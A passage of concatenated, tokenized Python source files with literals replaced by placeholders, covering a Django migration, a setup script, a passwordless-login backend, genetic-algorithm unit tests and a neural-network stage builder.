'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , 
[ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from PROJECTMODULE import settings <EOL> from PROJECTMODULE . main import create_app <EOL> app = create_app ( settings ) </s>
<s> import os <EOL> import re <EOL> from setuptools import setup , find_packages <EOL> ROOT = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> VERSIONFILE = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> VSRE = r"""<STR_LIT>""" <EOL> def get_version ( ) : <EOL> verstrline = open ( VERSIONFILE , '<STR_LIT>' ) . read ( ) <EOL> mo = re . search ( VSRE , verstrline , re . M ) <EOL> if mo : <EOL> return mo . group ( <NUM_LIT:1> ) <EOL> else : <EOL> raise RuntimeError ( <EOL> '<STR_LIT>' . format ( VERSIONFILE ) ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = get_version ( ) , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( os . path . join ( ROOT , '<STR_LIT>' ) ) . read ( ) , <EOL> packages = [ '<STR_LIT>' ] , <EOL> zip_safe = False , <EOL> include_package_data = True , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> from datetime import datetime , timedelta <EOL> from django . conf import settings <EOL> from django . contrib . auth . backends import ModelBackend <EOL> from django . core . exceptions import FieldError <EOL> from nopassword . models import LoginCode <EOL> from nopassword . utils import get_user_model <EOL> class NoPasswordBackend ( ModelBackend ) : <EOL> def authenticate ( self , code = None , ** credentials ) : <EOL> try : <EOL> user = get_user_model ( ) . objects . get ( ** credentials ) <EOL> if not self . verify_user ( user ) : <EOL> return None <EOL> if code is None : <EOL> return LoginCode . create_code_for_user ( user ) <EOL> else : <EOL> timeout = getattr ( settings , '<STR_LIT>' , <NUM_LIT> ) <EOL> timestamp = datetime . now ( ) - timedelta ( seconds = timeout ) <EOL> login_code = LoginCode . objects . get ( user = user , code = code , timestamp__gt = timestamp ) <EOL> user = login_code . user <EOL> user . code = login_code <EOL> login_code . delete ( ) <EOL> return user <EOL> except ( TypeError , get_user_model ( ) . DoesNotExist , LoginCode . DoesNotExist , FieldError ) : <EOL> return None <EOL> def send_login_code ( self , code , secure = False , host = None , ** kwargs ) : <EOL> raise NotImplementedError <EOL> def verify_user ( self , user ) : <EOL> return user . is_active </s>
<s> from servent import * <EOL> class PeerManager : <EOL> def __init__ ( self , argv , peergov ) : <EOL> self . datamanager = peergov . manager <EOL> self . peergov = peergov <EOL> if len ( argv ) == <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> defaultport = self . peergov . port or <NUM_LIT> <EOL> self . servent = Servent ( self , defaultport ) <EOL> for peer in argv : <EOL> try : <EOL> hp = peer . split ( "<STR_LIT::>" ) <EOL> port = hp [ <NUM_LIT:1> : <NUM_LIT:2> ] and int ( hp [ <NUM_LIT:1> ] ) or defaultport <EOL> self . servent . connectTo ( ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:6> , '<STR_LIT>' , ( hp [ <NUM_LIT:0> ] , port ) ) ) <EOL> pass <EOL> except Exception , e : <EOL> print str ( e ) <EOL> def handleServentEvent ( self , event , peerid ) : <EOL> if event == EVT_PEER_PROTOCOL_VERIFIED : <EOL> self . servent . syncAuthorities ( peerid ) <EOL> elif event == EVT_PEER_AUTHORITIES_SYNCHRONIZED : <EOL> with self . datamanager . authorities_lock : <EOL> authorities = self . datamanager . authorities <EOL> if authorities : <EOL> for authfpr in authorities . keys ( ) : <EOL> authority = authorities [ authfpr ] <EOL> if authority . interesting : <EOL> self . servent . syncTopics ( peerid , authority ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> self . peergov . resetTree ( ) <EOL> elif event == EVT_PEER_TOPIC_SYNCHRONIZED : <EOL> self . peergov . resetTree ( ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import copy <EOL> from operator import attrgetter <EOL> from six import next <EOL> from pyeasyga import pyeasyga <EOL> class TestPyeasyga ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . seed_data = [ ( '<STR_LIT>' , <NUM_LIT:15> ) , ( '<STR_LIT>' , <NUM_LIT:10> ) , ( '<STR_LIT>' , <NUM_LIT:12> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:5> ) , ( '<STR_LIT>' , <NUM_LIT:8> ) ] <EOL> member_1 = pyeasyga . Chromosome ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> member_2 = pyeasyga . Chromosome ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> member_3 = pyeasyga . Chromosome ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> member_4 = pyeasyga . Chromosome ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> self . population = [ ] <EOL> self . population . append ( member_1 ) <EOL> self . population . append ( member_2 ) <EOL> self . population . append ( member_3 ) <EOL> self . population . append ( member_4 ) <EOL> self . ga = pyeasyga . GeneticAlgorithm ( self . seed_data ) <EOL> self . ga . population_size = <NUM_LIT:10> <EOL> self . ga . generations = <NUM_LIT:10> <EOL> self . ga . fitness_function = lambda member , data : sum ( <EOL> [ profit for ( selected , ( fruit , profit ) ) in <EOL> zip ( member , data ) if selected and <EOL> member . count ( <NUM_LIT:1> ) == <NUM_LIT:3> ] ) <EOL> self . ga . selection_function = self . ga . tournament_selection <EOL> def test_genetic_algorithm_initialisation_1 ( self ) : <EOL> '''<STR_LIT>''' <EOL> ga_1 = pyeasyga . GeneticAlgorithm ( self . seed_data ) <EOL> assert ga_1 . population_size == <NUM_LIT:50> <EOL> assert ga_1 . generations == <NUM_LIT:100> <EOL> assert ga_1 . elitism is True <EOL> assert ga_1 . crossover_probability == <NUM_LIT> <EOL> assert ga_1 . 
mutation_probability == <NUM_LIT> <EOL> def test_genetic_algorithm_initialisation_2 ( self ) : <EOL> '''<STR_LIT>''' <EOL> ga_2 = pyeasyga . GeneticAlgorithm ( self . seed_data , <EOL> population_size = <NUM_LIT> , <EOL> generations = <NUM_LIT> , <EOL> crossover_probability = <NUM_LIT> , <EOL> mutation_probability = <NUM_LIT> ) <EOL> ga_2 . elitism = False <EOL> ga_2 . maximise_fitness = False <EOL> fruit , profit = ga_2 . seed_data [ <NUM_LIT:1> ] <EOL> assert len ( ga_2 . seed_data ) == <NUM_LIT:5> <EOL> assert ( fruit , profit ) == ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> assert ga_2 . population_size == <NUM_LIT> <EOL> assert ga_2 . generations == <NUM_LIT> <EOL> assert ga_2 . elitism is False <EOL> assert ga_2 . maximise_fitness is False <EOL> assert ga_2 . crossover_probability == <NUM_LIT> <EOL> assert ga_2 . mutation_probability == <NUM_LIT> <EOL> def test_chromosome_initialisation_1 ( self ) : <EOL> chromosome = pyeasyga . Chromosome ( [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> assert chromosome . genes == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> assert chromosome . fitness == <NUM_LIT:0> <EOL> assert str ( chromosome ) == "<STR_LIT>" <EOL> def test_chromosome_initialisation_2 ( self ) : <EOL> chromosome = pyeasyga . Chromosome ( [ '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:f>' ] ) <EOL> chromosome . fitness = <NUM_LIT:20> <EOL> assert chromosome . genes == [ '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:f>' ] <EOL> assert chromosome . fitness == <NUM_LIT:20> <EOL> assert str ( chromosome ) == "<STR_LIT>" <EOL> def test_fitness_function ( self ) : <EOL> func = self . ga . fitness_function <EOL> data = self . ga . 
seed_data <EOL> assert func ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] , data ) == <NUM_LIT> <EOL> assert func ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , data ) == <NUM_LIT> <EOL> assert func ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] , data ) == <NUM_LIT:0> <EOL> assert func ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , data ) == <NUM_LIT:0> <EOL> def test_crossover_function ( self ) : <EOL> parent_1 = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> parent_2 = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> crossover = lambda x , y : ( ( x [ : <NUM_LIT:2> ] + y [ <NUM_LIT:2> : ] ) , ( y [ : <NUM_LIT:2> ] + x [ <NUM_LIT:2> : ] ) ) <EOL> self . ga . crossover_function = crossover <EOL> child_1 , child_2 = self . ga . crossover_function ( parent_1 , parent_2 ) <EOL> assert child_1 == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> assert child_2 == [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> def test_mutate_function ( self ) : <EOL> '''<STR_LIT>''' <EOL> individual = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> self . ga . mutate_function ( individual ) <EOL> res = [ x == y for ( x , y ) in zip ( individual , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] ) ] <EOL> assert individual != [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> assert res . count ( False ) == <NUM_LIT:1> <EOL> def test_selection_function_1 ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . ga . current_generation = self . population <EOL> self . ga . calculate_population_fitness ( ) <EOL> self . ga . tournament_size = <NUM_LIT:4> <EOL> self . ga . selection_function = self . ga . tournament_selection <EOL> individual = self . ga . selection_function ( self . ga . 
current_generation ) <EOL> assert individual . genes == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> assert individual . fitness == <NUM_LIT> <EOL> assert len ( individual . genes ) == <NUM_LIT:5> <EOL> assert individual in self . population <EOL> def test_selection_function_2 ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . ga . current_generation = self . population <EOL> self . ga . calculate_population_fitness ( ) <EOL> self . ga . tournament_size = <NUM_LIT:0> <EOL> self . ga . selection_function = self . ga . tournament_selection <EOL> individual = self . ga . selection_function ( self . ga . current_generation ) <EOL> assert len ( individual . genes ) == <NUM_LIT:5> <EOL> assert individual in self . population <EOL> def test_selection_function_3 ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . ga . selection_function = self . ga . random_selection <EOL> individual = self . ga . selection_function ( self . population ) <EOL> assert len ( individual . genes ) == <NUM_LIT:5> <EOL> assert individual in self . population <EOL> def test_create_individual ( self ) : <EOL> data = self . ga . seed_data <EOL> individual = self . ga . create_individual ( data ) <EOL> assert len ( individual ) == <NUM_LIT:5> <EOL> assert all ( [ ind in ( <NUM_LIT:0> , <NUM_LIT:1> ) for ind in individual if ind in ( <NUM_LIT:0> , <NUM_LIT:1> ) ] ) <EOL> def test_create_initial_population ( self ) : <EOL> pop_size = self . ga . population_size <EOL> self . ga . create_initial_population ( ) <EOL> initial_pop = self . ga . current_generation <EOL> assert len ( initial_pop ) == pop_size <EOL> assert isinstance ( initial_pop [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> assert sum ( [ member . fitness for member in initial_pop ] ) == <NUM_LIT:0> <EOL> def test_calculate_population_fitness ( self ) : <EOL> self . ga . current_generation = self . population <EOL> self . ga . calculate_population_fitness ( ) <EOL> current_gen = self . 
ga . current_generation <EOL> assert sum ( [ member . fitness for member in current_gen ] ) > <NUM_LIT:0> <EOL> def test_rank_population ( self ) : <EOL> self . ga . create_initial_population ( ) <EOL> self . ga . calculate_population_fitness ( ) <EOL> new_population = copy . deepcopy ( self . ga . current_generation ) <EOL> new_population . sort ( key = attrgetter ( '<STR_LIT>' ) , reverse = True ) <EOL> self . ga . rank_population ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert current_gen [ <NUM_LIT:0> ] . fitness == new_population [ <NUM_LIT:0> ] . fitness <EOL> assert current_gen [ <NUM_LIT:1> ] . fitness == new_population [ <NUM_LIT:1> ] . fitness <EOL> def test_create_new_population ( self ) : <EOL> """<STR_LIT>""" <EOL> pop_size = self . ga . population_size <EOL> self . ga . create_initial_population ( ) <EOL> self . ga . calculate_population_fitness ( ) <EOL> self . ga . rank_population ( ) <EOL> self . ga . create_new_population ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert len ( current_gen ) == pop_size <EOL> assert isinstance ( current_gen [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> def test_create_first_generation ( self ) : <EOL> """<STR_LIT>""" <EOL> pop_size = self . ga . population_size <EOL> self . ga . create_first_generation ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert len ( current_gen ) == pop_size <EOL> assert isinstance ( current_gen [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> def test_create_next_generation ( self ) : <EOL> pop_size = self . ga . population_size <EOL> self . ga . create_first_generation ( ) <EOL> self . ga . create_next_generation ( ) <EOL> current_gen = self . ga . current_generation <EOL> assert len ( current_gen ) == pop_size <EOL> assert isinstance ( current_gen [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> def test_run ( self ) : <EOL> self . ga . 
run ( ) <EOL> current_gen = self . ga . current_generation <EOL> last_generation = self . ga . last_generation ( ) <EOL> assert len ( current_gen ) == self . ga . population_size <EOL> assert isinstance ( current_gen [ <NUM_LIT:0> ] , type ( pyeasyga . Chromosome ( [ <NUM_LIT:1> ] ) ) ) <EOL> assert isinstance ( next ( last_generation ) , type ( ( <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) ) ) <EOL> assert len ( next ( last_generation ) ) == <NUM_LIT:2> <EOL> assert len ( next ( last_generation ) [ <NUM_LIT:1> ] ) == <NUM_LIT:5> <EOL> def test_best_individual ( self ) : <EOL> self . ga . create_first_generation ( ) <EOL> best_fitness , best_genes = self . ga . best_individual ( ) <EOL> assert best_fitness == self . ga . current_generation [ <NUM_LIT:0> ] . fitness <EOL> assert best_genes == self . ga . current_generation [ <NUM_LIT:0> ] . genes <EOL> def test_last_generation ( self ) : <EOL> self . ga . create_first_generation ( ) <EOL> last_generation = self . ga . last_generation ( ) <EOL> assert isinstance ( next ( last_generation ) , type ( ( <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) ) ) <EOL> assert len ( next ( last_generation ) ) == <NUM_LIT:2> <EOL> assert len ( next ( last_generation ) [ <NUM_LIT:1> ] ) == <NUM_LIT:5> <EOL> def tearDown ( self ) : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> import sys <EOL> try : <EOL> from gitobox . main import main <EOL> except ImportError : <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> from gitobox . main import main <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> </s>
<s> import unittest <EOL> import arff <EOL> class TestEncodeComment ( unittest . TestCase ) : <EOL> def get_encoder ( self ) : <EOL> decoder = arff . ArffEncoder ( ) <EOL> return decoder <EOL> def test_simple ( self ) : <EOL> encoder = self . get_encoder ( ) <EOL> fixture = u'<STR_LIT>' <EOL> result = encoder . _encode_comment ( fixture ) <EOL> expected = u'<STR_LIT>' <EOL> self . assertEqual ( result , expected ) </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> import glob <EOL> import unittest <EOL> test_file_strings = glob . glob ( '<STR_LIT>' ) <EOL> module_strings = [ str [ <NUM_LIT:0> : len ( str ) - <NUM_LIT:3> ] for str in test_file_strings ] <EOL> suites = [ unittest . defaultTestLoader . loadTestsFromName ( str ) for str <EOL> in module_strings ] <EOL> testSuite = unittest . TestSuite ( suites ) <EOL> text_runner = unittest . TextTestRunner ( ) . run ( testSuite ) </s>
<s> from lstm_old import * <EOL> from lut import * <EOL> from reshape import * <EOL> from inner_prod import * <EOL> from dropout import * <EOL> from sequential import * <EOL> from const_weights import * <EOL> from const_value import * <EOL> from cos_sim import * <EOL> from lstm import * <EOL> from sum_prod import * <EOL> from selector import * <EOL> from sum2 import * <EOL> from conv1d import * <EOL> from maxpool1d import * <EOL> from meanpool1d import * <EOL> from normalize import * <EOL> from ordinal import * <EOL> from scipy import sparse <EOL> import h5py <EOL> import pickle <EOL> def routeFn ( name ) : <EOL> if name == '<STR_LIT>' : <EOL> return crossEntOne <EOL> elif name == '<STR_LIT>' : <EOL> return crossEntIdx <EOL> elif name == '<STR_LIT>' : <EOL> return crossEntOneIdx <EOL> elif name == '<STR_LIT>' : <EOL> return crossEntOneAccIdx <EOL> elif name == '<STR_LIT>' : <EOL> return rankingLoss <EOL> elif name == '<STR_LIT>' : <EOL> return hardLimit <EOL> elif name == '<STR_LIT>' : <EOL> return argmax <EOL> elif name == '<STR_LIT>' : <EOL> return argmaxDiff <EOL> elif name == '<STR_LIT>' : <EOL> return SigmoidActiveFn <EOL> elif name == '<STR_LIT>' : <EOL> return SoftmaxActiveFn <EOL> elif name == '<STR_LIT>' : <EOL> return TanhActiveFn <EOL> elif name == '<STR_LIT>' : <EOL> return IdentityActiveFn <EOL> elif name == '<STR_LIT:relu>' : <EOL> return ReluActiveFn <EOL> elif name == '<STR_LIT>' : <EOL> return meanSqErr <EOL> elif name == '<STR_LIT>' : <EOL> return meanSqErrEye <EOL> elif name == '<STR_LIT>' : <EOL> return roundInt <EOL> else : <EOL> raise Exception ( '<STR_LIT>' + name + '<STR_LIT>' ) <EOL> pass <EOL> stageLib = { } <EOL> def routeStage ( name ) : <EOL> return stageLib [ name ] <EOL> def addStage ( stageDict ) : <EOL> stage = None <EOL> initSeed = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0> <EOL> initRange = stageDict [ '<STR_LIT>' ] if stageDict . 
has_key ( '<STR_LIT>' ) else <NUM_LIT:1.0> <EOL> if stageDict . has_key ( '<STR_LIT>' ) : <EOL> print '<STR_LIT>' , stageDict [ '<STR_LIT:name>' ] <EOL> print '<STR_LIT>' , stageDict [ '<STR_LIT>' ] <EOL> if stageDict . has_key ( '<STR_LIT>' ) : <EOL> if stageDict [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> initWeights = np . loadtxt ( stageDict [ '<STR_LIT>' ] ) <EOL> elif stageDict [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> initWeightsFile = h5py . File ( stageDict [ '<STR_LIT>' ] ) <EOL> if stageDict . has_key ( '<STR_LIT>' ) and stageDict [ '<STR_LIT>' ] : <EOL> key = stageDict [ '<STR_LIT>' ] <EOL> iwShape = initWeightsFile [ key + '<STR_LIT>' ] [ : ] <EOL> iwData = initWeightsFile [ key + '<STR_LIT>' ] [ : ] <EOL> iwInd = initWeightsFile [ key + '<STR_LIT>' ] [ : ] <EOL> iwPtr = initWeightsFile [ key + '<STR_LIT>' ] [ : ] <EOL> initWeights = sparse . csr_matrix ( <EOL> ( iwData , iwInd , iwPtr ) , shape = iwShape ) <EOL> else : <EOL> initWeights = initWeightsFile [ stageDict [ '<STR_LIT>' ] ] [ : ] <EOL> print initWeights . shape <EOL> elif stageDict [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> initWeights = np . load ( stageDict [ '<STR_LIT>' ] ) <EOL> else : <EOL> raise Exception ( <EOL> '<STR_LIT>' % stageDict [ '<STR_LIT>' ] ) <EOL> else : <EOL> initWeights = np . load ( stageDict [ '<STR_LIT>' ] ) <EOL> else : <EOL> initWeights = <NUM_LIT:0> <EOL> needInit = False if stageDict . has_key ( '<STR_LIT>' ) else True <EOL> biasInitConst = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else - <NUM_LIT:1.0> <EOL> learningRate = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> learningRateAnnealConst = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> momentum = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> deltaMomentum = stageDict [ '<STR_LIT>' ] if stageDict . 
has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> gradientClip = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> weightClip = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> weightRegConst = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> outputdEdX = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True <EOL> defaultValue = ( np . zeros ( stageDict [ '<STR_LIT>' ] ) + stageDict [ '<STR_LIT>' ] ) if stageDict . has_key ( '<STR_LIT>' ) else <NUM_LIT:0.0> <EOL> if stageDict . has_key ( '<STR_LIT>' ) : <EOL> inputList = stageDict [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> for i in range ( len ( inputList ) ) : <EOL> inputList [ i ] = inputList [ i ] . strip ( ) <EOL> else : <EOL> inputList = None <EOL> if stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = LSTM_Old ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> needInit = needInit , <EOL> cutOffZeroEnd = stageDict [ '<STR_LIT>' ] , <EOL> multiErr = stageDict [ '<STR_LIT>' ] , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = LSTM ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> timespan = stageDict [ '<STR_LIT>' ] , <EOL> defaultValue = defaultValue , <EOL> initSeed = initSeed , <EOL> 
initRange = initRange , <EOL> initWeights = initWeights , <EOL> needInit = needInit , <EOL> multiInput = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> multiOutput = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else stageDict [ '<STR_LIT>' ] , <EOL> cutOffZeroEnd = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , <EOL> weightClip = weightClip , <EOL> weightRegConst = weightRegConst , <EOL> outputdEdX = outputdEdX <EOL> ) <EOL> elif stageDict [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> stage = LUT ( <EOL> name = stageDict [ '<STR_LIT:name>' ] , <EOL> inputDim = stageDict [ '<STR_LIT>' ] , <EOL> outputDim = stageDict [ '<STR_LIT>' ] , <EOL> inputNames = inputList , <EOL> lazyInit = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else True , <EOL> initSeed = initSeed , <EOL> initRange = initRange , <EOL> initWeights = initWeights , <EOL> intConversion = stageDict [ '<STR_LIT>' ] if stageDict . has_key ( '<STR_LIT>' ) else False , <EOL> sparse = stageDict [ '<STR_LIT>' ] == True if stageDict . has_key ( '<STR_LIT>' ) else False , <EOL> needInit = needInit , <EOL> learningRate = learningRate , <EOL> learningRateAnnealConst = learningRateAnnealConst , <EOL> momentum = momentum , <EOL> deltaMomentum = deltaMomentum , <EOL> gradientClip = gradientClip , 